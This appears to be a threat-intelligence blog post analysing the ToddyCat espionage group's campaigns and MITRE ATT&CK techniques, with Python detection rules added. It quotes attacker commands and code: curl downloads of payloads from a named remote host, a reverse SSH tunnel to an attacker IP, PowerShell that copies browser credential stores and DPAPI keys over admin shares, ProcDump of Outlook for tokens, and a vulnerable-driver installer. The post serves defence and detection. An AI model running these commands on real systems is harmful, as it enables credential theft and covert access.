Dissecting ToddyCat Cyber Espionage and MITRE TTPs

Picus Labs | 15 MIN READ

LAST UPDATED ON JANUARY 07, 2026

ToddyCat began operations in December 2020 by compromising Microsoft Exchange servers in Taiwan and Vietnam through a then-unidentified vulnerability. In February 2021 the group escalated quickly, abusing the ProxyLogon vulnerability to reach high-profile organizations across Europe and Asia. By September 2021 its focus had widened to desktop systems in Central Asia, where loaders for the Ninja Trojan were delivered over Telegram, and its 2024 activity brought new tooling: TCESB, which is loaded through a DLL search-order flaw in ESET's command-line scanner, and a PowerShell variant of TomBerBil that runs on domain controllers and harvests browser credentials from other hosts over SMB.

The group employs a diverse set of tactics, techniques, and procedures. PowerShell and the Windows Command Shell run its scripts, and persistence rests on scheduled tasks and reverse SSH tunnels. Its defense evasion is notably sophisticated: the "Bring Your Own Vulnerable Driver" (BYOVD) technique, DLL side-loading and proxying, and purpose-built tools such as TCSectorCopy, which reads Outlook data files straight from the volume to get around file locks. ToddyCat moves laterally over SMB administrative shares, pulling saved browser credentials from remote user profiles and dumping the memory of Microsoft 365 processes for OAuth tokens, and finally compresses the stolen data with WinRAR or 7-Zip before exfiltrating it over its C2 channels.

In this post, we review ToddyCat's major historical operations and dissect the group's tactics, techniques, and procedures to understand how it runs stealthy cyber-espionage campaigns. Finally, we show how Picus helps defend against this group.


What Are the Major Activities of the ToddyCat Group?

December 2020 – ToddyCat launched a campaign targeting Microsoft Exchange servers in Taiwan and Vietnam. The group used an unidentified vulnerability to deploy the China Chopper web shell. This initial breach started a multi-stage infection chain in which specialized loaders ultimately installed Samurai, a passive backdoor that waits for inbound connections instead of beaconing out to a C2 server [1].

26 February 2021 – The group began a rapid escalation of attacks, abusing the ProxyLogon vulnerability to compromise multiple high-profile organizations across Europe and Asia. While the infection vector changed to ProxyLogon, the subsequent attack chain remained consistent with their earlier campaigns [1].

September 2021 – ToddyCat expanded its tactics to target desktop systems in Central Asia, distributing loaders for the Ninja Trojan via Telegram as zip archives containing executable files [1].

Early 2024 – Kaspersky found a suspicious version.dll in temporary directories on compromised devices and identified it as TCESB, a tool built to run payloads stealthily. It is loaded through a DLL search-order vulnerability (CVE-2024-11859) in the ESET command-line scanner, which picked the library up from its working directory instead of the system directory [2].

May–June 2024 – A new PowerShell variant of the TomBerBil tool appeared in incidents. It was run on domain controllers and reached the browser profile files of other hosts over SMB administrative shares, harvesting saved credentials and cookies from Chrome, Edge, and Firefox [3].

Which MITRE ATT&CK Techniques Are Used by ToddyCat?

The following section provides an in-depth breakdown of the TTPs linked to ToddyCat, consolidating intelligence findings from multiple distinct operations [4] [3] [2].

Tactic: Execution

T1059.001 Command and Scripting Interpreter: PowerShell

PowerShell runs scripts that automate the theft of sensitive data from the victim's environment. The scripts, such as ip445.ps1 in the ProgramData directory, are launched with -exec bypass. Note that the execution policy is a safety feature rather than a security boundary, so bypassing it takes no exploit; the value of this detail is as a detection signal (powershell.exe started with an execution-policy bypass and a script under ProgramData), not as evidence of privilege escalation.

The script establishes a working directory to stage the collected data. The following code snippet illustrates the initialization of this directory:

$baseDir = 'c:\programdata\temp\'

try{
    # Staging directory for everything collected from remote hosts; the empty
    # catch block swallows the error raised when the directory already exists
    New-Item -ItemType directory -Path $baseDir | Out-Null
}catch{

}

T1059.003 Command and Scripting Interpreter: Windows Command Shell

The Windows Command Shell is frequently employed to manage files, configure the environment, and execute tools. 

Batch scripts such as a.bat take ownership of C:\Windows\AppReadiness, the directory in which the group keeps its renamed OpenSSH private keys, and strip the ACL entries of Administrators, Authenticated Users, Users and CREATOR OWNER, so the accounts named in those entries lose access to the keys (the SYSTEM and TrustedInstaller entries are not touched, and the new owner can always re-grant itself rights). The final icacls call appends the resulting ACL to %temp%\a.txt. A directory under C:\Windows from which BUILTIN\Administrators has been removed is itself a strong hunting indicator:

@echo off
::# Set Key File Variable:

Set Key="C:\Windows\AppReadiness"

takeown /f "%Key%"
icacls "%Key%" /remove "BUILTIN\Administrators" > "%temp%\a.txt"
icacls "%Key%" /remove "Administrators" >> "%temp%\a.txt"
icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" >> "%temp%\a.txt"
icacls "%Key%" /remove "CREATOR OWNER" >> "%temp%\a.txt"
icacls "%Key%" /remove "BUILTIN\Users" >> "%temp%\a.txt"
icacls "%Key%" /remove "Users" >> "%temp%\a.txt"
icacls "%Key%" >> "%temp%\a.txt"

::# Remove Variable:
set "Key="

cmd.exe is also used to invoke curl to download payloads from remote servers. In the example below the downloads, disguised as .js files, are the SoftEther VPN server executable and its hamcore.se2 resource file; they are written to c:\windows\debug\wia\ under names borrowed from Windows Image Acquisition (wia), and stdout and stderr are redirected to randomly named .tmp files in C:\WINDOWS\Temp so that nothing appears on a console:

"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o c:\windows\debug\wia\wia.exe > C:\WINDOWS\Temp\vwqkspeq.tmp 2>&1


"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o c:\windows\debug\wia\hamcore.se2 > C:\WINDOWS\Temp\nohEicOE.tmp 2>&1

The shell also installs and configures the tunnelling tools: the renamed SoftEther VPN server (here taskllst.exe) is registered as a service with /install and its tray icon suppressed with /usermode_hidetray, and the Krong proxy is started through its host executable (SystemInformation.exe) with an address and port as arguments:

"cmd.exe" /C c:\users\public\music\taskllst.exe /install > C:\Windows\Temp\fnOcaiqm.tmp 2>&1


"cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray > C:\Windows\Temp\TSwkLRsR.tmp


"cmd" /c "cd C:\windows\temp & SystemInformation.exe 0.0.0.0 54112"

T1569.002 System Services: Service Execution

To route traffic from the Command and Control (C2) infrastructure into the network and survive reboots, the FRP (fast reverse proxy) client is installed as a service under an arbitrary name. The service runs the client with -c pointing at its configuration, which has been renamed from the usual .toml to a .ini file to look like an ordinary settings file:

C:\windows\debug\tck.exe -c c:\windows\debug\tc.ini

Tactic: Persistence

T1053.005 Scheduled Task/Job: Scheduled Task

Scheduled tasks are relied upon to maintain persistence and periodically execute data collection tools, such as TomBerBil. This ensures continued access to the compromised environment. One such task executes a PowerShell command to bypass policies and run a script located in ProgramData:

powershell -exec bypass -command "c:\programdata\ip445.ps1"

Scheduled tasks also launch reverse SSH tunnels. In the command below, -R 31481:localhost:53 binds port 31481 on the attacker's server and forwards connections arriving there to port 53 on the infected host, so the operators can query the domain controller's DNS service from their own infrastructure (the basis of the host discovery described under T1018). The identity file carries a .dat extension, StrictHostKeyChecking=accept-new suppresses the interactive host-key prompt, and -N opens no remote shell, so the session is a pure tunnel:

C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o StrictHostKeyChecking=accept-new -R 31481:localhost:53 systemtest01@103.27.202.85 -p 22222 -N

Tactic: Defense Evasion

T1006 Direct Volume Access

To bypass the file locks held by the Outlook application, a specialized tool named TCSectorCopy is employed. Outlook stores mailbox data in OST (Offline Storage Table) files, which are locked while the application is running. TCSectorCopy, a 32-bit C++ PE file, opens the disk as a device in read-only mode and copies the file's content block by block, sidestepping the sharing locks enforced by the normal file API. Opening a volume device needs administrative rights and is visible in telemetry: Sysmon Event ID 9 (RawAccessRead) records the process and the \Device\HarddiskVolumeN it opened, and a process other than a backup or security agent doing this is rare on an ordinary workstation.

The command used to copy the locked OST file is shown below; the tool was launched under the name xCopy.exe, mimicking the built-in xcopy utility, and writes the copy with an .ost2 extension:

xCopy.exe  C:\Users\<user>\AppData\Local\Microsoft\Outlook\<email>@<domain>.ost <email>@<domain>.ost2

T1027 Obfuscated Files or Information

Payload data is encrypted to conceal its contents. In one instance, files are encrypted with AES-128; the first 32 bytes of the payload file are not the key itself but key material, which is hashed with CryptHashData and then turned into the AES-128 key by CryptDeriveKey. The following decompiled snippet shows the derivation:

ReadFile(hFile, pbData, 32u, &NumberOfBytesRead, 0i64);              // read the 32-byte key material
if ( !CryptHashData(phHash, pbData, 32u, 0)                           // hash it ...
  || !CryptDeriveKey(phProv, CALG_AES_128, phHash, 0, phKey) )        // ... and derive the AES-128 key from the hash
  return 0i64;
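As an added example (not code from TCESB or from Kaspersky's analysis), the same key schedule reproduced in Python so that an analyst can recover the AES-128 key from a payload file on a non-Windows host. The post does not say which hash algorithm the CryptHashData object was created with, so the algorithm is a parameter; SHA-1 as the default is an assumption, and so is the file layout of 32 bytes of key material followed by ciphertext. The derivation follows the algorithm Microsoft documents for CryptDeriveKey.

```python
"""Reproduce the snippet above outside Windows: CryptHashData over the payload's first
32 bytes, then CryptDeriveKey(CALG_AES_128) over that hash. Added example, not code from
TCESB or Kaspersky. The hash algorithm is not stated in the post; SHA-1 is an assumed
default, as is the [32 bytes key material][ciphertext] layout."""
import hashlib


def cryptderivekey(base_data: bytes, hash_name: str = "sha1", key_len: int = 16) -> bytes:
    """CryptDeriveKey for an AES/3DES key from a CryptHashData hash of base_data.
    For SHA-2 hashes the key is the leading key_len bytes of the hash value. For other
    hashes (MD5, SHA-1) Microsoft's documented expansion applies: XOR the hash value
    into 64-byte 0x36 and 0x5C pads, hash each pad, concatenate, truncate."""
    h = hashlib.new(hash_name, base_data).digest()
    if hash_name.lower() in ("sha256", "sha384", "sha512"):
        return h[:key_len]
    ipad = bytearray(b"\x36" * 64)
    opad = bytearray(b"\x5c" * 64)
    for i, byte in enumerate(h):          # only the first len(h) bytes of each pad change
        ipad[i] ^= byte
        opad[i] ^= byte
    expanded = (hashlib.new(hash_name, bytes(ipad)).digest()
                + hashlib.new(hash_name, bytes(opad)).digest())
    if len(expanded) < key_len:
        raise ValueError("hash too short for the requested key length")
    return expanded[:key_len]


def split_payload(blob: bytes):
    """Split an encrypted payload file into its 32-byte key material and the ciphertext."""
    if len(blob) < 32:
        raise ValueError("payload shorter than its 32-byte key header")
    return blob[:32], blob[32:]


def recover_key(blob: bytes, hash_name: str = "sha1") -> bytes:
    """AES-128 key for a payload file laid out as [32 bytes key material][ciphertext]."""
    key_material, _ = split_payload(blob)
    return cryptderivekey(key_material, hash_name, 16)


if __name__ == "__main__":
    sample = b"A" * 32 + b"ciphertext"   # constructed stand-in for a payload file
    print(recover_key(sample).hex())
```

The AES mode and IV are not given on the page either, so the decryption step is left to the analyst once the key is known (for example with a third-party AES library); the function only reproduces the key. If the sample turns out to use an MD5 hash object, the same function applies with hash_name="md5", since MD5 also takes the pad-expansion path.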

Traffic through the Krong proxy is obfuscated with a simple XOR function rather than real encryption. This hides the nature of the data from casual inspection, but a single-byte or repeating-key XOR offers no real confidentiality: known plaintext, such as constant protocol headers, reveals the key.

Furthermore, standard file extensions are altered to mask malicious files; for example, OpenSSH private keys are renamed with .ini or .dat extensions, and configuration files are renamed from .toml to .ini:

C:\Windows\AppReadiness\read.ini
C:\Windows\AppReadiness\data.dat
C:\Windows\AppReadiness\log.dat
C:\Windows\AppReadiness\value.dat

T1036.005 Masquerading: Match Legitimate Name or Location

Executable files such as the SoftEther VPN server (vpnserver_x64.exe) are renamed to resemble legitimate system files or security products and dropped into directories that look like vendor folders. Renaming changes neither the file's version resource nor its Authenticode signature, so a signer or product name that does not match the path and file name is the check that exposes these files. Observed masqueraded file paths include:

c:\programdata\ssh\vmtools.exe
c:\programdata\lenovo\lenovo_kln.exe
c:\programdata\iobit\iobitrtt\tmp\realtime.exe
c:\perflogs\ecache\host.exe
C:\users\public\music\wia.exe
c:\windows\debug\wja\wia.exe
c:\users\public\music\tasklist.exe
c:\programdata\lenovo\Lenovo_main.exe
c:\programdata\intel\gcc\gcc\boot.exe
c:\programdata\lenovo\Lenovodisplaycontrolcenterservice\netscan.exe
c:\programdata\kasperskylab\kaspersky.exe

Additionally, a variant of the TomBerBil tool mimics Kaspersky Anti-Virus by using the name avpui.exe and including relevant metadata.

T1211 Exploitation for Defense Evasion

The "Bring Your Own Vulnerable Driver" (BYOVD) technique is employed to modify kernel structures by installing a vulnerable driver, DBUtilDrv2.sys (CVE-2021-36276). This driver is installed via the Device Manager interface using an INF file. The decompiled code for installing the driver is shown below:

HANDLE installDriver()
{
  HANDLE result; // rax
  WCHAR a1[32]; // [rsp+40h] [rbp-258h] BYREF
  WCHAR Filename[268]; // [rsp+80h] [rbp-218h] BYREF

  if ( hObject )
    goto LABEL_7;
  memset(Filename, 0, 0x208ui64);
  GetModuleFileNameW(0i64, Filename, 0x104u);
  PathRemoveFileSpecW(Filename);
  strcpy(Filename, L"\\dbutildrv2.INF");
  if ( SetupDi(Filename, L"ROOT\\DBUtilDrv2", 0x26u, &DeviceInfoOut, &DeviceInfoData) )
    logInfo(L"supSetupInstallDriverFromInf Success\n");
  else
    logInfo(L"supSetupInstallDriverFromInf Failed %d\n");

T1574.001 Hijack Execution Flow: DLL

Malicious code is executed via DLL proxying: a malicious version.dll exports every function of the legitimate system library and forwards calls to the original DLL so that the host application keeps working, while the malicious payload runs alongside. This abused CVE-2024-11859 in ESET's command-line scanner (ecls.exe), which loaded version.dll from its current working directory ahead of the system directory. Because the genuine version.dll lives in System32 (and SysWOW64), a process loading a copy from any other location, such as a temp directory, is the event to look for in image-load telemetry.

The Krong tool is likewise delivered as a DLL that is side-loaded by a legitimate, digitally signed AVG TuneUp executable, so the malicious code runs inside a trusted, signed process.

Tactic: Credential Access

T1528 Steal Application Access Token

To obtain OAuth 2.0 access tokens, the process memory of Microsoft 365 applications is dumped. "SharpTokenFinder" is the primary tool; when local security tools block it, Sysinternals "ProcDump" is used instead. Being a signed Microsoft utility, ProcDump passes most allow-lists, and -ma writes a full memory dump of the target process (here Outlook) to disk; the dir command afterwards simply confirms that the dump landed in C:\Windows\Temp:

procdump64.exe -accepteula -ma OUTLOOK.exe


dir c:\windows\temp\OUTLOOK.EXE_id.dmp

T1555.003 Credentials from Password Stores: Credentials from Web Browsers 

Saved logins, passwords, and other sensitive data are extracted from web browsers. The tools target the "Login Data" SQLite database of Chrome and Edge, and in Firefox the legacy key3.db and signons.sqlite as well as the current key4.db and logins.json pairs. The WAExp tool specifically targets the web version of WhatsApp by collecting its local storage files from these browsers. Note that the passwords in a Chromium "Login Data" file are DPAPI-protected, which is why the same script also copies the user's DPAPI master keys (see T1555.004).

The following PowerShell code demonstrates the copying of the "Login Data" file:

$googlepath = $upath + "\google\"
$firefoxpath = $upath + "\firefox\"
$edgepath = $upath + "\edge\"
# $item is the remote user's profile directory (\\<host>\c$\users\<user>); only the Default Chrome profile is collected
$loginDataPath = $item.FullName + "\AppData\Local\Google\Chrome\User Data\Default\Login Data"

if(test-path -path $loginDataPath) {
    $dstFileName = "{0}\{1}" -f $googlepath, "Login Data"
    copy-item -Force -Path $loginDataPath -Destination $dstFileName | Out-Null
}

For Firefox, the script iterates through profiles to locate specific files:

$firefox_files = @("key3.db", "signons.sqlite", "key4.db", "logins.json")
$firefoxBase = $item.FullName + "\AppData\Roaming\Mozilla\Firefox\Profiles"

if(test-path -path $firefoxBase) {
    $profiles = get-childitem $firefoxBase -Force -ErrorAction SilentlyContinue
    foreach($profile in $profiles){
        # one output directory per Firefox profile, created on first use
        if (-not (test-path -path ($firefoxpath + $profile.Name))){
            New-Item -ItemType directory -Path ($firefoxpath + $profile.Name) | Out-Null
        }
        foreach($firefox_file in $firefox_files){
            $tmpPath = $firefoxBase + "\" + $profile.Name + "\" + $firefox_file
            if(test-path -path $tmpPath) {
                $dstFileName = "{0}\{1}\{2}" -f $firefoxpath, $profile.Name, $firefox_file
                copy-item -Force -Path $tmpPath -Destination $dstFileName | Out-Null
            }
        }
    }
}

T1555.004 Credentials from Password Stores: Windows Credential Manager

The script also copies the Windows Credential Manager vault blobs under AppData\Local\Microsoft\Credentials and the per-user DPAPI master keys under AppData\Roaming\Microsoft\Protect. The master keys are what make the browser and Credential Manager blobs usable: with the master key files plus the user's password (or the domain's DPAPI backup key), the attackers can decrypt them offline on their own machines.

if(test-path -path ($item.FullName + "\AppData\Local\Microsoft\Credentials")) {
    copy-item -Recurse -Force -Path ($item.FullName + "\AppData\Local\Microsoft\Credentials") -Destination ($upath) | Out-Null
}

if(test-path -path ($item.FullName + "\AppData\Roaming\Microsoft\Protect")){
    copy-item -Recurse -Force -Path ($item.FullName + "\AppData\Roaming\Microsoft\Protect") -Destination ($upath) | Out-Null
}

Tactic: Discovery

T1018 Remote System Discovery

Reconnaissance is performed through the SSH tunnels established on domain controllers: the -R ...:53 forward described under T1053.005 gives the operators access to the controller's DNS service, and DNS queries through it resolve the IP addresses of hosts within the internal network.

T1033 System Owner/User Discovery

The TomBerBil tool identifies logged-on users by enumerating all running processes and looking for instances of explorer.exe. For each such process it queries the WMI Win32_Process class and calls GetOwner to retrieve the user and domain for the process ID:

using System.Management;

// method signature reconstructed around the decompiled body
private static string GetProcessOwner(int pID)
{
    string result = null;
    ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(new SelectQuery("Select * from Win32_Process WHERE processID=" + pID));
    try
    {
        using (ManagementObjectCollection.ManagementObjectEnumerator enumerator = managementObjectSearcher.Get().GetEnumerator())
        {
            if (enumerator.MoveNext())
            {
                ManagementObject managementObject = (ManagementObject)enumerator.Current;
                ManagementBaseObject methodParameters = managementObject.GetMethodParameters("GetOwner");
                // GetOwner returns User and Domain out-parameters; only the user name is kept
                result = managementObject.InvokeMethod("GetOwner", methodParameters, null)["User"].ToString();
            }
        }
    }
    catch
    {
        // GetOwner fails, or returns no user, for system processes: treat them as SYSTEM
        result = "SYSTEM";
    }
    return result;
}

T1057 Process Discovery

Tools like "SharpTokenFinder" search the system for specific processes associated with the Microsoft 365 suite, including "TEAMS", "WINWORD", "ONENOTE", "POWERPNT", "OUTLOOK", "EXCEL", "ONEDRIVE", and "SHAREPOINT".

T1082 System Information Discovery 

To locate the kernel memory offsets its driver-assisted code needs, the tool determines the kernel version and looks the offsets up in a CSV file embedded in its resources, or alternatively takes them from data retrieved from the kernel's PDB symbol file.

T1083 File and Directory Discovery

Scripts enumerate user directories on remote hosts to identify data collection targets, excluding specific folders.

# profile directories that are not real users and are skipped
$filter_users = @('public','all users','default','default user','desktop.ini','.net v4.5','.net v4.5 classic')

foreach($item in $items){
    $username = $item.Name
    if($filter_users -contains $username.tolower()){
        continue
    }
    # one local output directory per remote user, with a subfolder per browser
    $upath = $lpath + '\' + $username

    try{
        New-Item -ItemType directory -Path $upath | Out-Null
        New-Item -ItemType directory -Path ($upath + '\google') | Out-Null
        New-Item -ItemType directory -Path ($upath + '\firefox') | Out-Null
        New-Item -ItemType directory -Path ($upath + '\edge') | Out-Null
    }catch{

    }

Also, the cuthead tool performs a recursive search for documents with specific extensions (e.g., PDF, DOC, DOCX, XLS, XLSX) or keywords, optimizing the search by excluding directories such as "Windows", "Program Files", "ProgramData", "Application Data", and "Documents and Settings".

Tactic: Lateral Movement

T1021.002 Remote Services: SMB/Windows Admin Shares

Connections to remote hosts go over SMB to the C$ administrative share, from which the script reaches every user profile directory. The host list is read from c:\programdata\uhosts.txt, and each host gets its own staging directory under the base directory created earlier. On the target this shows up, when Detailed File Share auditing is enabled, as Security event 5145 for C$ with RelativeTargetName paths under Users\<user>\AppData, which is an unusual thing for a domain controller to do to workstations:

foreach($myhost in parseFile('c:\programdata\uhosts.txt')){   # parseFile: helper elsewhere in the script that returns the host list
    $myhost=$myhost.TrimEnd()
    $open=$false

    # remote user profiles via the administrative share
    $cpath = "\\{0}\c$\users\" -f $myhost
    $items = @(get-childitem $cpath -Force -ErrorAction SilentlyContinue)

    # local staging directory for this host
    $lpath = $baseDir + $myhost
    try{
        New-Item -ItemType directory -Path $lpath | Out-Null
    }catch{

    }

Additionally, files required for the attack, including SSH clients and private keys, are transferred to target hosts using these shared folders.

Tactic: Collection

T1005 Data from Local System

The cuthead tool collects large volumes of data from the local file system by searching for files based on extensions and keywords. The following command (cuthead renamed fkw.exe) collects PDF, Word and Excel files modified after 26 June 2023; the date argument is in YYYYMMDD form and the extension list is semicolon-separated:

"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx

T1114.001 Email Collection: Local Email Collection

Corporate email correspondence is stolen by copying local Outlook OST files using the "TCSectorCopy" tool. Once the files are obtained, the content is extracted using "XstReader".

XstExport.exe -e <mail>@<domain>.ost2

T1560.001 Archive Collected Data: Archive via Utility

Collected data, including process memory dumps, is compressed into archives using the WinRAR utility before exfiltration (-m5 selects maximum compression and -s a solid archive):

c:\progra~1\winrar\rar.exe a -k -r -s -m5 -1024M tempdmp.rar c:\windows\temp\OUTLOOK.EXE_id.dmp

In some scenarios a Volume Shadow Copy of the disk is created and user data is archived from it with 7-Zip. Reading through the \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path sidesteps the locks a running browser holds on its profile, the same problem TCSectorCopy solves for Outlook. wmic shadowcopy call create on a workstation, followed by an archiver reading a HarddiskVolumeShadowCopy path, is a pairing worth alerting on:

wmic shadowcopy call create Volume=C:\


"cmd" /c c:\intel\7za.exe a c:\intel\1.7z \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\<username>\AppData\Local\Google\Chrome\"User Data"

T1560.002 Archive Collected Data: Archive via Library

Data is also compressed using software libraries; cuthead uses SharpZipLib (version 0.85.4.369) to create ZIP archives protected with the password "Unsafe404". 

Similarly, WAExp utilizes the System.IO.Compression.ZipFile module to pack WhatsApp data.

Tactic: Exfiltration

T1041 Exfiltration Over C2 Channel

Collected and archived data, including browser profiles and files gathered by tools like cuthead and WAExp, are exfiltrated through the established command and control channels.
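The command lines and file paths quoted above (the execution-policy bypass under T1059.001, the icacls and curl commands under T1059.003, the reverse SSH tunnel under T1053.005, the raw volume read of T1006, the masqueraded paths of T1036.005, the driver load of T1211, the version.dll load of T1574.001, the ProcDump call under T1528, the remote browser credential store access of T1555.003 over the C$ share of T1021.002, and the WinRAR, shadow copy and 7-Zip steps under T1560.001) translate directly into detection content. The following Python is an added example, not Picus or Kaspersky code: a small rule set run over constructed sample events shaped like the fields a SIEM would carry for Windows 4688 / Sysmon 1 process creation, Sysmon 9 RawAccessRead, Sysmon 7 ImageLoad, Sysmon 6 DriverLoad and Security 5145 share access. Host names and the 203.0.113.10 and example.test endpoints in the samples are placeholders rather than observed indicators, and the patterns are written from the command lines quoted in this post.

```python
"""Detection rules for the ToddyCat command lines and file/driver events quoted in this
post, run over constructed sample events. Added example, not Picus or Kaspersky code."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    source: str        # proc | rawread | imageload | driverload | share
    host: str
    image: str = ""    # process image (proc), loaded module (imageload / driverload)
    data: str = ""     # command line (proc), device (rawread), RelativeTargetName (share)


# (rule name, event source, Event attribute to match, pattern), matched case-insensitively.
RULES = [
    ("powershell_exec_bypass_programdata", "proc", "data",
     r'powershell(\.exe)?\s.*-exec(utionpolicy)?\s+bypass.*\\programdata\\'),
    ("reverse_ssh_tunnel", "proc", "data", r'\bssh(\.exe)?\b.*\s-R\s*\d+:'),
    ("icacls_strip_admins", "proc", "data", r'\bicacls\b.*/remove\s+"?(BUILTIN\\)?Administrators'),
    ("curl_drop_windows_debug", "proc", "data", r'\bcurl\b.*\s-o\s+\S*\\windows\\debug\\'),
    ("procdump_m365", "proc", "data",
     r'procdump(64)?(\.exe)?\b.*-ma\s+(outlook|teams|winword|excel|onenote|powerpnt|onedrive)'),
    ("rar_of_memory_dump", "proc", "data", r'\brar(\.exe)?\s+a\b.*\.dmp\b'),
    ("wmic_shadowcopy_create", "proc", "data", r'\bwmic\b.*shadowcopy\s+call\s+create'),
    ("archive_from_shadowcopy", "proc", "data", r'\b(7za?|rar)(\.exe)?\s+a\b.*HarddiskVolumeShadowCopy\d+'),
    ("exe_in_masquerade_dir", "proc", "image",
     r'^[a-z]:\\(programdata\\(lenovo|intel|iobit|kasperskylab|ssh)|perflogs|users\\public\\music|windows\\debug)\\.*\.exe$'),
    ("raw_volume_read", "rawread", "data", r'\\Device\\Harddisk(Volume\d+|\d+\\DR\d+)'),
    ("version_dll_outside_system32", "imageload", "image",
     r'^(?!c:\\windows\\(system32|syswow64)\\).*\\version\.dll$'),
    ("vulnerable_driver_load", "driverload", "image", r'\\dbutildrv2\.sys$'),
    ("remote_browser_credential_store", "share", "data",
     r'(^|\\)users\\[^\\]+\\appdata\\(local\\(google\\chrome|microsoft\\edge)\\user data\\.*\\login data$'
     r'|roaming\\mozilla\\firefox\\profiles\\.*\\(logins\.json|key[34]\.db|signons\.sqlite)$)'),
]
COMPILED = [(name, src, attr, re.compile(rx, re.I)) for name, src, attr, rx in RULES]


def scan(events):
    """Return (rule, host, matched text) for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, src, attr, rx in COMPILED:
            text = getattr(ev, attr)
            if ev.source == src and rx.search(text):
                hits.append((name, ev.host, text))
    return hits


def parse_ssh_reverse_forward(cmdline):
    """Decode `ssh -R [bind:]port:host:hostport user@server`: connections to
    remote_bind_port on the attacker's server are relayed to local_target as seen
    from the compromised host (localhost:53 on a DC is the internal DNS service)."""
    fwd = re.search(r'-R\s*(?:[^\s:]+:)?(\d+):([^\s:]+):(\d+)', cmdline)
    if not fwd:
        return None
    peer = re.search(r'\s(\S+@\S+)', cmdline)
    return {"remote_bind_port": int(fwd.group(1)),
            "local_target": f"{fwd.group(2)}:{fwd.group(3)}",
            "peer": peer.group(1) if peer else None}


SSH_CMD = (r"C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat "
           r"-o StrictHostKeyChecking=accept-new -R 31481:localhost:53 systemtest01@203.0.113.10 -p 22222 -N")

# Constructed sample telemetry modelled on the command lines quoted in the post. Host names
# and the 203.0.113.10 / example.test endpoints are placeholders, not observed indicators.
SAMPLE_EVENTS = [
    Event("proc", "dc01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r'powershell -exec bypass -command "c:\programdata\ip445.ps1"'),
    Event("proc", "dc01", r"C:\PROGRA~1\OpenSSH\ssh.exe", SSH_CMD),
    Event("proc", "dc01", r"C:\Windows\System32\icacls.exe",
          r'icacls "C:\Windows\AppReadiness" /remove "BUILTIN\Administrators"'),
    Event("proc", "srv02", r"C:\Windows\System32\cmd.exe",
          r'"cmd.exe" /C curl http://www.example.test/common/css/main.js -o c:\windows\debug\wia\wia.exe'),
    Event("proc", "srv02", r"c:\users\public\music\tasklist.exe", r'"c:\users\public\music\tasklist.exe" /install'),
    Event("proc", "ws07", r"C:\Windows\Temp\procdump64.exe", "procdump64.exe -accepteula -ma OUTLOOK.exe"),
    Event("proc", "ws07", r"c:\progra~1\winrar\rar.exe",
          r"c:\progra~1\winrar\rar.exe a -k -r -s -m5 tempdmp.rar c:\windows\temp\OUTLOOK.EXE_id.dmp"),
    Event("proc", "ws07", r"C:\Windows\System32\wbem\WMIC.exe", "wmic shadowcopy call create Volume=C:\\"),
    Event("proc", "ws07", r"C:\Windows\System32\cmd.exe",
          r'"cmd" /c c:\intel\7za.exe a c:\intel\1.7z \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\alice\AppData\Local\Google\Chrome\"User Data"'),
    Event("rawread", "ws07", r"C:\Windows\Temp\xCopy.exe", r"\Device\HarddiskVolume3"),
    Event("imageload", "ws07", r"C:\Users\alice\AppData\Local\Temp\version.dll"),
    Event("imageload", "ws07", r"C:\Windows\System32\version.dll"),            # benign control
    Event("driverload", "ws07", r"C:\Windows\System32\drivers\dbutildrv2.sys"),
    Event("share", "ws07", data=r"users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event("proc", "ws07", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell -command Get-Process"),                                    # benign control
]


def run_sample():
    """Hits for the constructed events: one per attacker event, none for the controls."""
    return scan(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, host, text in run_sample():
        print(f"{host:6} {rule:34} {text}")
    print(parse_ssh_reverse_forward(SSH_CMD))
```

Each rule is keyed to one telemetry source and one field, so an event only costs the regexes that apply to it. In production the masquerade-directory and raw-volume rules need a baseline (backup agents and some security products legitimately open volume devices, and vendor folders under ProgramData hold real updaters), while the procdump, shadow-copy and dbutildrv2 rules are close to zero-noise on workstations. parse_ssh_reverse_forward turns an ssh -R command line into a statement of what the tunnel exposes, which is the detail an analyst needs in the alert rather than the raw command line.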

How Does Picus Simulate ToddyCat Attacks?

We strongly suggest simulating ToddyCat attacks to test the effectiveness of your security controls against real-life cyber attacks with the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for ToddyCat:

Threat ID   Threat Name                                                        Attack Module
93286       ToddyCat Threat Group Campaign Backdoor Malware Download Threat    Network Infiltration
76195       ToddyCat Threat Group Campaign Backdoor Malware Email Threat       Network Infiltration
24249       ToddyCat Threat Group Campaign Malware Email Threat                Network Infiltration
22363       ToddyCat Threat Group Campaign Malware Download Threat             Network Infiltration
83850       ToddyCat Threat Group Campaign                                     Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the ToddyCat Group?

ToddyCat is also known as: Websiic, Storm-0247.

Key Takeaways

  • ToddyCat has evolved from compromising Microsoft Exchange servers in Asia (first through an unknown vulnerability, then ProxyLogon) to targeting high-profile organizations across Europe and Asia, and desktop users in Central Asia with the Telegram-delivered Ninja Trojan.
  • Recent operations in 2024 involved tools like TCESB, loaded through a DLL search-order vulnerability in ESET's command-line scanner, and a PowerShell variant of TomBerBil that runs on domain controllers to harvest credentials from other hosts.
  • The group employs sophisticated defense evasion strategies, including the Bring Your Own Vulnerable Driver (BYOVD) technique and DLL side-loading, to execute malicious payloads within trusted processes.
  • Persistence and execution are maintained through scheduled tasks, reverse SSH tunnels, and extensive PowerShell and Windows Command Shell scripts.
